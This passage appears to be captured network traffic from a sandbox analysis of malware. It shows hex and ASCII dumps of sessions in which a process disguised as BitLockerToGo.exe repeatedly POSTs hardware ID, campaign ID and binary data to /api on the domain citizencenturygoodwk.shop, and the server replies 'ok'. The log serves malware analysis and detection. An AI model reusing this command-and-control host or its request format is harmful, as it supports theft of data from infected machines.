              2024-07-05 04:03:11 UTC | 1369 | IN | Data Raw: 2b 6f 45 78 46 31 32 50 37 6c 43 54 6b 37 7a 54 50 6c 74 48 48 46 57 77 48 65 59 6c 45 47 70 6a 63 5a 51 4a 36 34 35 4b 61 67 33 6e 77 41 6b 7a 47 4c 71 58 65 59 38 33 75 46 74 6d 47 78 4e 5a 54 49 78 41 36 35 43 78 77 68 5a 51 33 42 6e 32 70 78 39 4b 44 4e 4c 31 4c 52 4e 5a 6d 38 70 4d 6e 35 4f 51 35 78 4a 6a 5a 79 67 46 70 41 58 6d 48 53 42 43 4f 31 6e 6f 46 66 65 32 58 6d 38 6c 33 2f 41 41 4c 32 58 61 39 78 47 47 71 31 7a 4c 47 6e 64 58 57 55 79 4d 51 4f 75 51 73 63 49 57 55 4e 77 5a 39 71 63 66 53 67 7a 75 38 51 6b 54 53 59 76 61 55 49 75 62 73 4f 4d 79 55 33 73 67 42 59 41 74 38 6a 55 6b 55 6e 64 4a 79 42 48 58 75 6d 35 62 4d 64 2f 77 41 43 39 6c 32 76 63 52 68 71 73 30 59 2f 4e 2f 33 2b 6c 4d 6a 45 44 72 6b 4c 48 43 46 6c 44 63 47 66 61 6e 48 30 6f
              Data Ascii: +oExF12P7lCTk7zTPltHHFWwHeYlEGpjcZQJ645Kag3nwAkzGLqXeY83uFtmGxNZTIxA65CxwhZQ3Bn2px9KDNL1LRNZm8pMn5OQ5xJjZygFpAXmHSBCO1noFfe2Xm8l3/AAL2Xa9xGGq1zLGndXWUyMQOuQscIWUNwZ9qcfSgzu8QkTSYvaUIubsOMyU3sgBYAt8jUkUndJyBHXum5bMd/wAC9l2vcRhqs0Y/N/3+lMjEDrkLHCFlDcGfanH0o
              2024-07-05 04:03:11 UTC | 1052 | IN | Data Raw: 53 39 39 74 2b 5a 63 6b 37 4f 51 2b 79 70 6a 56 78 52 56 67 44 33 69 47 51 42 4f 57 32 48 6f 48 64 65 2b 5a 30 49 31 31 38 6b 56 54 6e 6a 61 2f 33 42 48 6e 37 44 62 4b 6d 39 76 57 4f 31 42 50 4e 70 4d 4a 63 2f 65 39 62 6b 4d 78 37 70 50 51 6d 33 58 79 52 6b 44 57 59 76 69 55 4a 75 76 71 4e 63 47 53 32 64 49 53 62 67 5a 7a 68 30 6f 55 6b 74 4e 35 45 33 62 69 6c 4a 6a 4b 4f 62 51 43 42 5a 77 75 2b 6f 52 6a 73 71 42 2f 2f 35 37 59 79 77 4a 75 44 48 6a 4d 42 51 54 53 76 68 78 71 61 4b 76 66 6c 38 39 33 36 67 41 4c 31 47 58 35 6e 79 66 76 37 54 37 49 6d 38 54 48 47 6e 4d 42 65 59 4e 50 45 35 58 58 63 77 52 38 37 35 4f 61 77 6a 43 38 54 45 4f 65 49 4c 2f 63 4a 50 4b 69 5a 34 76 64 39 39 41 49 63 78 6c 35 72 55 6f 55 33 4a 52 6f 54 78 6d 43 39 49 6d 42 64 37 56
              Data Ascii: S99t+Zck7OQ+ypjVxRVgD3iGQBOW2HoHde+Z0I118kVTnja/3BHn7DbKm9vWO1BPNpMJc/e9bkMx7pPQm3XyRkDWYviUJuvqNcGS2dISbgZzh0oUktN5E3bilJjKObQCBZwu+oRjsqB//57YywJuDHjMBQTSvhxqaKvfl8936gAL1GX5nyfv7T7Im8THGnMBeYNPE5XXcwR875OawjC8TEOeIL/cJPKiZ4vd99AIcxl5rUoU3JRoTxmC9ImBd7V
              2024-07-05 04:03:11 UTC | 1369 | IN | Data Raw: 33 61 39 36 0d 0a 65 57 78 48 67 4e 65 65 32 62 6b 63 34 7a 75 6b 39 48 33 6d 72 39 6d 53 44 6e 34 33 2b 48 33 35 62 48 43 79 46 58 4e 73 78 78 48 4a 50 45 65 51 59 78 71 34 44 65 71 31 7a 5a 57 77 6d 65 61 66 48 63 65 36 69 69 4d 4d 57 5a 33 63 51 55 5a 51 5a 33 68 45 49 57 6d 4e 39 32 43 58 6a 75 6b 4a 76 46 50 4c 46 46 53 74 4e 76 38 5a 55 72 37 65 68 2f 68 39 2b 57 78 77 73 68 56 7a 62 4d 63 52 79 45 39 6e 6f 62 4d 61 75 41 33 71 74 63 32 56 73 4a 6e 6d 6e 78 33 48 75 6f 6f 6a 48 45 6d 39 66 42 47 32 6b 50 63 6f 5a 44 47 4a 58 56 63 41 68 33 34 70 79 61 7a 44 43 30 52 6b 76 56 61 66 4f 61 4a 75 48 72 66 34 66 66 6c 73 63 4c 49 56 63 32 7a 47 45 34 6a 73 52 46 44 33 4c 79 33 39 4c 63 65 64 6f 70 49 4d 63 73 76 5a 73 76 71 72 70 39 69 5a 62 65 7a 77 46
              Data Ascii: 3a96eWxHgNee2bkc4zuk9H3mr9mSDn43+H35bHCyFXNsxxHJPEeQYxq4Deq1zZWwmeafHce6iiMMWZ3cQUZQZ3hEIWmN92CXjukJvFPLFFStNv8ZUr7eh/h9+WxwshVzbMcRyE9nobMauA3qtc2VsJnmnx3HuoojHEm9fBG2kPcoZDGJXVcAh34pyazDC0RkvVafOaJuHrf4fflscLIVc2zGE4jsRFD3Ly39LcedopIMcsvZsvqrp9iZbezwF
              2024-07-05 04:03:11 UTC | 1369 | IN | Data Raw: 67 63 30 6e 39 4e 38 41 44 50 4f 6d 5a 66 50 64 2f 42 64 42 62 59 46 6c 6f 56 68 71 75 55 7a 69 63 57 55 67 42 42 6c 41 58 32 44 51 78 47 62 31 6e 41 48 63 65 47 55 6e 63 67 6c 74 30 78 4f 33 32 37 38 6b 79 2f 71 38 44 72 48 6c 74 76 45 55 79 39 4e 4e 49 74 66 57 38 53 55 4e 79 46 79 36 4a 61 43 77 44 61 37 41 67 6e 42 49 4a 58 33 53 50 4f 67 66 38 36 52 6c 70 68 52 49 51 70 33 69 30 45 55 6c 4e 42 7a 44 6e 37 71 6c 5a 72 44 50 37 56 47 53 74 35 72 2f 70 45 74 34 4f 67 38 78 5a 50 56 7a 52 31 68 54 7a 72 4f 42 78 79 45 6c 69 39 44 4d 63 71 49 68 73 6b 73 38 67 42 55 6b 41 61 57 39 7a 71 6f 6f 6a 6a 46 33 59 36 43 55 32 77 49 65 6f 52 42 46 5a 72 45 65 77 35 33 36 5a 36 61 7a 6a 75 35 52 55 58 56 61 50 69 52 49 2b 7a 6b 4f 38 32 5a 32 4d 4e 54 4c 30 30 30
              Data Ascii: gc0n9N8ADPOmZfPd/BdBbYFloVhquUzicWUgBBlAX2DQxGb1nAHceGUncglt0xO3278ky/q8DrHltvEUy9NNItfW8SUNyFy6JaCwDa7AgnBIJX3SPOgf86RlphRIQp3i0EUlNBzDn7qlZrDP7VGSt5r/pEt4Og8xZPVzR1hTzrOBxyEli9DMcqIhsks8gBUkAaW9zqoojjF3Y6CU2wIeoRBFZrEew536Z6azju5RUXVaPiRI+zkO82Z2MNTL000
              2024-07-05 04:03:11 UTC | 1369 | IN | Data Raw: 79 45 48 32 6f 61 39 74 48 34 71 46 79 72 4b 69 43 31 42 62 32 4b 59 37 4b 67 62 59 66 31 76 61 74 34 49 52 30 30 31 41 56 62 32 39 56 6c 45 33 66 71 69 5a 4f 45 43 59 78 42 58 64 4e 68 39 70 30 64 31 4d 77 79 79 4a 37 59 67 69 4a 33 41 6d 53 50 51 68 79 69 36 48 6b 47 5a 65 36 52 6c 73 4e 33 2f 43 6f 67 74 51 57 39 6b 32 4f 79 6f 41 61 4a 31 5a 62 2f 58 51 6c 6b 48 2b 63 48 41 39 79 4f 4e 55 46 45 36 70 47 65 78 43 47 6a 44 32 6a 49 59 2f 4b 58 49 71 71 73 56 36 4c 32 76 59 41 56 49 56 63 32 33 41 6c 7a 39 37 30 63 51 58 58 34 33 38 69 42 5a 2b 41 5a 48 6f 30 35 72 63 35 4c 67 59 6b 67 68 2f 57 39 71 77 6f 4a 5a 42 2f 6e 42 77 33 63 6a 6a 56 54 50 34 48 30 2b 36 68 33 6f 41 49 54 6e 43 36 36 6b 69 37 72 34 54 48 4b 6a 38 54 47 45 48 63 4d 4d 37 4a 35 4f
              Data Ascii: yEH2oa9tH4qFyrKiC1Bb2KY7KgbYf1vat4IR001AVb29VlE3fqiZOECYxBXdNh9p0d1MwyyJ7YgiJ3AmSPQhyi6HkGZe6RlsN3/CogtQW9k2OyoAaJ1Zb/XQlkH+cHA9yONUFE6pGexCGjD2jIY/KXIqqsV6L2vYAVIVc23Alz970cQXX438iBZ+AZHo05rc5LgYkgh/W9qwoJZB/nBw3cjjVTP4H0+6h3oAITnC66ki7r4THKj8TGEHcMM7J5O
              2024-07-05 04:03:11 UTC | 1369 | IN | Data Raw: 52 5a 75 62 66 33 71 74 63 32 53 6b 4c 32 43 36 6c 33 6e 47 6b 69 6c 53 69 39 70 62 45 41 69 46 58 4e 74 77 56 51 4d 6d 46 49 46 45 6a 67 66 54 37 33 48 6e 61 4b 53 44 48 42 70 62 33 53 4b 72 30 66 35 48 66 68 49 35 37 43 6d 51 66 7a 46 56 62 78 4a 51 33 52 6e 4c 37 6a 5a 62 41 49 62 45 46 64 65 42 4a 38 35 73 69 2f 50 49 6f 78 74 4c 34 39 6a 4a 66 4d 57 47 50 53 52 57 62 77 47 5a 42 50 34 48 30 2b 36 68 33 76 51 49 54 6e 46 65 39 31 47 50 56 72 46 65 69 39 72 32 41 43 79 46 58 4e 73 78 79 47 4a 4c 59 63 42 64 67 70 4c 69 65 78 44 61 6b 55 6c 7a 52 49 64 4f 71 41 71 71 73 56 36 4c 32 76 59 41 56 49 56 63 32 33 67 6c 7a 39 37 30 63 51 58 58 34 33 38 69 42 5a 2b 41 5a 48 6f 30 35 72 63 35 4c 67 59 6b 67 68 2f 57 39 71 77 6f 4a 5a 42 2f 6e 42 77 33 63 6a 6a
              Data Ascii: RZubf3qtc2SkL2C6l3nGkilSi9pbEAiFXNtwVQMmFIFEjgfT73HnaKSDHBpb3SKr0f5HfhI57CmQfzFVbxJQ3RnL7jZbAIbEFdeBJ85si/PIoxtL49jJfMWGPSRWbwGZBP4H0+6h3vQITnFe91GPVrFei9r2ACyFXNsxyGJLYcBdgpLiexDakUlzRIdOqAqqsV6L2vYAVIVc23glz970cQXX438iBZ+AZHo05rc5LgYkgh/W9qwoJZB/nBw3cjj


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              2 | 192.168.2.6 | 49713 | 188.114.96.3 | 443 | 3800 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
              Timestamp | Bytes transferred | Direction | Data
              2024-07-05 04:03:12 UTC | 291 | OUT | POST /api HTTP/1.1
              Connection: Keep-Alive
              Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
              Content-Length: 12863
              Host: citizencenturygoodwk.shop
              2024-07-05 04:03:12 UTC | 12863 | OUT | Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 36 31 36 30 31 31 45 41 44 33 42 32 37 32 39 45 43 37 30 33 30 32 30 31 39 45 36 38 32 42 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 40 53 45 46 59
              Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"B616011EAD3B2729EC70302019E682B3--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LPnhqo--@SEFY
              2024-07-05 04:03:12 UTC | 814 | IN | HTTP/1.1 200 OK
              Date: Fri, 05 Jul 2024 04:03:12 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: close
              Set-Cookie: PHPSESSID=9irulufli53qst9lks2pbf8gjl; expires=Mon, 28-Oct-2024 21:49:51 GMT; Max-Age=9999999; path=/
              Expires: Thu, 19 Nov 1981 08:52:00 GMT
              Cache-Control: no-store, no-cache, must-revalidate
              Pragma: no-cache
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tXqwJjjiHhmxF9MgylXUE0A%2F2JW7Pf%2FUEgR%2BXNgQ7lMFhyrZNedyt5R%2FLatyuuFi8xHs1dOiK3TNnYOnc9rmex6QhUCCgZXzhV415aIHmfyM%2F2oh0y2jKTY9OEl4hMp6JmpxsI4jzv68%2Fz1n"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 89e476c1fb2b8cee-EWR
              alt-svc: h3=":443"; ma=86400
              2024-07-05 04:03:12 UTC | 19 | IN | Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
              Data Ascii: eok 8.46.123.33
              2024-07-05 04:03:12 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
              Data Ascii: 0


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              3 | 192.168.2.6 | 49714 | 188.114.96.3 | 443 | 3800 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
              Timestamp | Bytes transferred | Direction | Data
              2024-07-05 04:03:13 UTC | 291 | OUT | POST /api HTTP/1.1
              Connection: Keep-Alive
              Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
              Content-Length: 15109
              Host: citizencenturygoodwk.shop
              2024-07-05 04:03:13 UTC | 15109 | OUT | Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 36 31 36 30 31 31 45 41 44 33 42 32 37 32 39 45 43 37 30 33 30 32 30 31 39 45 36 38 32 42 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 40 53 45 46 59
              Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"B616011EAD3B2729EC70302019E682B3--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LPnhqo--@SEFY
              2024-07-05 04:03:13 UTC | 806 | IN | HTTP/1.1 200 OK
              Date: Fri, 05 Jul 2024 04:03:13 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: close
              Set-Cookie: PHPSESSID=ajhagii16jk8odimgr5imkfpt9; expires=Mon, 28-Oct-2024 21:49:52 GMT; Max-Age=9999999; path=/
              Expires: Thu, 19 Nov 1981 08:52:00 GMT
              Cache-Control: no-store, no-cache, must-revalidate
              Pragma: no-cache
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9DNGo1wclv7x8xHFjY4SK1Qef1ojau%2Bs7n565SuK0ZpBSMqbgp0gSvd1f5QLeR2m3nnhYbY%2BNjMAQ4RR1yZRICGnLp1nyBwyH9FiSb6zuOZdLv4CPKzNtavxmdH5GBj8HbM1OioogaeV6Cw3"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 89e476c8aa31c47f-EWR
              alt-svc: h3=":443"; ma=86400
              2024-07-05 04:03:13 UTC | 19 | IN | Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
              Data Ascii: eok 8.46.123.33
              2024-07-05 04:03:13 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
              Data Ascii: 0


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              4 | 192.168.2.6 | 49715 | 188.114.96.3 | 443 | 3800 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
              Timestamp | Bytes transferred | Direction | Data
              2024-07-05 04:03:14 UTC | 291 | OUT | POST /api HTTP/1.1
              Connection: Keep-Alive
              Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
              Content-Length: 19967
              Host: citizencenturygoodwk.shop
              2024-07-05 04:03:14 UTC | 15331 | OUT | Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 36 31 36 30 31 31 45 41 44 33 42 32 37 32 39 45 43 37 30 33 30 32 30 31 39 45 36 38 32 42 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 40 53 45 46 59
              Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"B616011EAD3B2729EC70302019E682B3--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LPnhqo--@SEFY
              2024-07-05 04:03:14 UTC | 4636 | OUT | Data Raw: 03 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70 e3
              Data Ascii: +?2+?2+?o?Mp5p
              2024-07-05 04:03:15 UTC | 808 | IN | HTTP/1.1 200 OK
              Date: Fri, 05 Jul 2024 04:03:15 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: close
              Set-Cookie: PHPSESSID=2flh24qm3himv9cn1iun41fmmj; expires=Mon, 28-Oct-2024 21:49:54 GMT; Max-Age=9999999; path=/
              Expires: Thu, 19 Nov 1981 08:52:00 GMT
              Cache-Control: no-store, no-cache, must-revalidate
              Pragma: no-cache
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hT9QESr3lPYIlBwCuizoR9r%2BL2zZSzwYQf2OnuLDzPtkrfuSRKPAItROvh6YZhWbAyrP8W7RnM9djtcWXviimFCekfHQO0a%2FnStRDHgueVxM2azgGreFGBSk9sfiTDM7ky5WXc%2F2rOT21M1J"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 89e476d0ba457277-EWR
              alt-svc: h3=":443"; ma=86400
              2024-07-05 04:03:15 UTC | 19 | IN | Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
              Data Ascii: eok 8.46.123.33
              2024-07-05 04:03:15 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
              Data Ascii: 0


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              5 | 192.168.2.6 | 49717 | 188.114.96.3 | 443 | 3800 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
              Timestamp | Bytes transferred | Direction | Data
              2024-07-05 04:03:16 UTC | 290 | OUT | POST /api HTTP/1.1
              Connection: Keep-Alive
              Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
              Content-Length: 7100
              Host: citizencenturygoodwk.shop
              2024-07-05 04:03:16 UTC | 7100 | OUT | Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 36 31 36 30 31 31 45 41 44 33 42 32 37 32 39 45 43 37 30 33 30 32 30 31 39 45 36 38 32 42 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 40 53 45 46 59
              Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"B616011EAD3B2729EC70302019E682B3--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LPnhqo--@SEFY
              2024-07-05 04:03:16 UTC | 822 | IN | HTTP/1.1 200 OK
              Date: Fri, 05 Jul 2024 04:03:16 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: close
              Set-Cookie: PHPSESSID=q5m075tn6jk06p8kmu6fvnepko; expires=Mon, 28-Oct-2024 21:49:55 GMT; Max-Age=9999999; path=/
              Expires: Thu, 19 Nov 1981 08:52:00 GMT
              Cache-Control: no-store, no-cache, must-revalidate
              Pragma: no-cache
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wq4J5XPrwN%2Bui%2F4vTKf9oUj9xRmKlEU%2Fxqd%2BCi8iHcK0y4tQGJj6l3yw5XkX%2FjNVPlwbQqmZWusbredXFxA2o9WPiCkHwyYHEDGejB52y4a9pE%2FRBynfOll%2BhZOt3erGJ%2B%2FdyX%2FT2N5TWMrB"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 89e476dbed908c57-EWR
              alt-svc: h3=":443"; ma=86400
              2024-07-05 04:03:16 UTC | 19 | IN | Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
              Data Ascii: eok 8.46.123.33
              2024-07-05 04:03:16 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
              Data Ascii: 0


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              6 | 192.168.2.6 | 49720 | 188.114.96.3 | 443 | 3800 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
              Timestamp | Bytes transferred | Direction | Data
              2024-07-05 04:03:17 UTC | 290 | OUT | POST /api HTTP/1.1
              Connection: Keep-Alive
              Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
              Content-Length: 1264
              Host: citizencenturygoodwk.shop
              2024-07-05 04:03:17 UTC | 1264 | OUT | Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 36 31 36 30 31 31 45 41 44 33 42 32 37 32 39 45 43 37 30 33 30 32 30 31 39 45 36 38 32 42 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 40 53 45 46 59
              Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"B616011EAD3B2729EC70302019E682B3--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LPnhqo--@SEFY
              2024-07-05 04:03:17 UTC | 806 | IN | HTTP/1.1 200 OK
              Date: Fri, 05 Jul 2024 04:03:17 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: close
              Set-Cookie: PHPSESSID=l6nctisv8tg3ookqvl7u6ol7vp; expires=Mon, 28-Oct-2024 21:49:56 GMT; Max-Age=9999999; path=/
              Expires: Thu, 19 Nov 1981 08:52:00 GMT
              Cache-Control: no-store, no-cache, must-revalidate
              Pragma: no-cache
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dW%2BGm3PZzIK6vZBTThGIjVbzwCIjJ2gELzzmMExf5tZC74sktvKnd5WtWSqPQ4dHFqOBHLhys0ApSWDAV0mUtAh6vMhunJLFTq0zO46CHRJ42SuXc3K8NogQCrTYZzg3J9VlXPGnAcR%2FcA9W"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 89e476e239a8420b-EWR
              alt-svc: h3=":443"; ma=86400
              2024-07-05 04:03:17 UTC | 19 | IN | Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
              Data Ascii: eok 8.46.123.33
              2024-07-05 04:03:17 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
              Data Ascii: 0


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              7 | 192.168.2.6 | 49722 | 188.114.96.3 | 443 | 3800 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
              Timestamp | Bytes transferred | Direction | Data
              2024-07-05 04:03:18 UTC | 292 | OUT | POST /api HTTP/1.1
              Connection: Keep-Alive
              Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
